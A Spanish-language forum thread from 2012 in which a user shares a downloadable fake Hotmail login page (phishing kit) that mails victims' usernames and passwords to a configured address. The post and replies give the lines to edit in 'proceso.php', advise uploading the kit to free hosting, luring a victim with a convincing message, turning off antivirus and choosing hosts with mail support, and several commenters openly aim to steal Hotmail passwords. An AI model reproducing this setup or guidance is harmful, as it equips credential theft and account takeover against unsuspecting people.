Fake hotmail (By Aryenal)

Iniciado por Aryenal.Bt, Agosto 12, 2012, 11:21:20 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.


hola Underc0de aquí les dejo a su dispocision un Fake de hotmail.

Descripción: este fake como todos lo que hace es imitar una pagina de inicio de hotmail, con la intención de que una persona ingenua o que desconoce el termino de phishing caiga en ella, una ves que la victima haiga puesto sus datos ("usuario y contraseña") el fake lo llevara a la pagina verdadera de hotmail, paralelamente los datos puestos por la victima habrán sido enviados a una cuenta de correo especificada. la cual te hablo en el siguiente parrafo.


Nota: modifiquen las lineas del archivo "proceso.php" siguientes por la dirección de correo electrónico a donde quieren que lleguen los datos:

$from="[email protected]";
$to="[email protected]";

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pass: Aryenal
Saludos, cualquier cosa estaré atendiendo sus ¿?

PD: No me hago responsable por el uso que le den.

Agosto 12, 2012, 11:55:05 PM #1 Ultima modificación: Agosto 12, 2012, 11:59:59 PM por zoro248
Muchas gracias por el aporte, lo malo es ya casi nadie usa hotmail, puro facebook... corrijo pense que era aplicacion de msn, mmm. una duda muy novata y como monto la pagina??  si le doy en loginmail.... me salen errores... disculpa es que soy noob en php...



...Saludos  --->

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muchas gracias por el aporte, lo malo es ya casi nadie usa hotmail, puro facebook... corrijo pense que era aplicacion de msn, mmm. una duda muy novata y como monto la pagina??  si le doy en loginmail.... me salen errores... disculpa es que soy noob en php...

...Saludos  --->

mira lo primero tienes que subir los archivos de descarga a un hosting ya se gratuito o de paga, luego enviar un mensaje conteiedo el link que contenga el archivo "loginmail.php" con un argumento convincente a una X persona. y ponerte a esperar.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muchas gracias por el aporte, lo malo es ya casi nadie usa hotmail, puro facebook... corrijo pense que era aplicacion de msn, mmm. una duda muy novata y como monto la pagina??  si le doy en loginmail.... me salen errores... disculpa es que soy noob en php...

...Saludos  --->

mira lo primero tienes que subir los archivos de descarga a un hosting ya se gratuito o de paga, luego enviar un mensaje conteiedo el link que contenga el archivo "loginmail.php" con un argumento convincente a una X persona. y ponerte a esperar.
aaa ok, lo subire a un hosting gratuito, pero no hay mas que modificar??. no importa a q servidor lo suba....?

gracias por la respuesta

No importa como sea el hosting, puedes usar por ejemplo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si te fijas en esta misma sección yo publique un vídeo tutorial y explicaba como crear el de Facebook y como subirlo a un hosting.



Saludos

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No importa como sea el hosting, puedes usar por ejemplo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si te fijas en esta misma sección yo publique un vídeo tutorial y explicaba como crear el de Facebook y como subirlo a un hosting.



Saludos

Si a con ese hosting pensaba hacer la prueba.....bueno lo checare, gracias por responder

Saludos --->  ;D :) ;D

Cuando Voy a extraerlos en una carpete (opcion=extraer aqui) Me sale una ventanita de dialogo diciendo WinRar: mensaje de diagnositico Y solo me sale una carpeta con dos carpetas dentro pero ningun contenido...
Cuando abro el .rar hay si me muestra el contenido q hay pero no me deja abrirlos.. Saludos

Tiene pinta de que el rar esta dañado y seguramente sea debido por tu AntiVirus que ha detectado la descarga y la ha bloqueado y entonces no se ha descargado correctamente. Desactiva tu AV y vuelve a descargarlo.



Saludos


Muy bueno hermano. Estoy deseando llebarlo a cabo xD

Hola, lo descargue pero al momento de subirlo a mi host, no sube lo archivos php y solo las carpetas vacias... porque pasara esto???, sera porque al momento de cambiar los datos en el archivo procesador quedo como block de notas por defecto al igual que loginmail, por favor alguien que me pueda ayudar o en todo casop saben donde hay algun tuto de domo crear fake de hotmail. Saludos y gracias

para subir los archivos es preferible utilizar un cliente FTP como Filezilla No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


lo estuve revisando y esta excelente
El futuro pertenece a quienes creen en la belleza de sus sueños

Gracias bro!!! saludos... haces muy buenos aportes....
Nunca consideres el estudio como una obligación, sino como una oportunidad para penetrar en el bello y maravilloso mundo del saber.

no me manda el correo, solo modifique las lineas del correo pero no me llega? hay algo mas que modificar?


solo modifique estas dos lineas en el archivo, que mas modifico para que me mande el mensaje?
$from="[email protected]";
$to="[email protected]";


byethots, jajaja sera por eso? cual recomiendas?

gracias anticipadas

acabo de ver su panel de control en el servicio de hosting Gratuito y no tiene el servicio de eMail, es por eso que no te funciona, prueba con 000webhost o talvez con nixiweb.

Guauuuu una nueva forma de robar una pass de hotmail !!!!
Voy a probar este nuevo metodo, se ve increible y novedoso!! :D
8)